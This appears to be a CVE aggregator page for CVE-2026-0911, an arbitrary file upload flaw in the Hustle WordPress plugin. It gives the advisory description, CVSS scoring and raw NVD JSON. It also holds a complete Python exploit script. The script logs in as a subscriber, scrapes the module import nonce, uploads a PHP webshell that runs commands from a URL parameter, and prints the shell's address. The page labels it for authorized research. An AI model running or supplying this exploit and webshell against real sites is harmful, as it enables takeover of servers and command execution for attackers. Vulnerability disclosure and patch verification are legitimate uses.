Security Vulnerability Report
中文
CVE-2026-0911 CVSS 7.5 HIGH

CVE-2026-0911

Published: 2026-01-24 13:15:55
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hustle插件所有版本 <= 7.8.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2026-0911 PoC - Arbitrary File Upload in Hustle WordPress Plugin # Target: WordPress site with Hustle plugin <= 7.8.9.2 TARGET = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "password" def get_nonce(session, target): """Extract nonce from Hustle admin page""" url = f"{target}/wp-admin/admin.php?page=hustle_modules" response = session.get(url) soup = BeautifulSoup(response.text, 'html.parser') nonce_input = soup.find('input', {'name': 'hustle_module_import_nonce'}) if nonce_input: return nonce_input.get('value') return None def exploit(target, username, password): """Exploit arbitrary file upload vulnerability""" session = requests.Session() # Step 1: Authenticate login_url = f"{target}/wp-login.php" login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In'} session.post(login_url, data=login_data) # Step 2: Get nonce nonce = get_nonce(session, target) if not nonce: print("[-] Failed to obtain nonce. Admin may not have granted permissions.") return False # Step 3: Upload malicious file upload_url = f"{target}/wp-admin/admin-ajax.php" # PHP webshell content webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" files = { 'file': ('shell.php', webshell, 'application/octet-stream') } data = { 'action': 'hustle_module_import', 'hustle_module_import_nonce': nonce, 'hustle_module_type': 'popup' } response = session.post(upload_url, data=data, files=files) if 'success' in response.text or response.status_code == 200: print("[+] File uploaded successfully!") print(f"[+] Access shell at: {target}/wp-content/uploads/hustle-files/shell.php?cmd=id") return True else: print("[-] Upload failed") return False if __name__ == "__main__": exploit(TARGET, USERNAME, PASSWORD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0911", "sourceIdentifier": "[email protected]", "published": "2026-01-24T13:15:55.300", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce."}, {"lang": "es", "value": "El plugin The Hustle – Email Marketing, Lead Generation, Optins, Popups para WordPress es vulnerable a cargas de archivos arbitrarios debido a una validación incorrecta del tipo de archivo en la función action_import_module() en todas las versiones hasta, e incluyendo, la 7.8.9.2. Esto hace posible que atacantes autenticados, con un rol de menor privilegio (por ejemplo, acceso de nivel de Suscriptor y superior), carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código. La explotación exitosa requiere que un administrador otorgue permisos del módulo Hustle (o acceso de edición de módulo) al usuario de bajo privilegio para que puedan acceder a la página de administración de Hustle y obtener el nonce requerido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3440956/wordpress-popup", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22be5fb5-143e-4934-9f93-e17def18e883?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.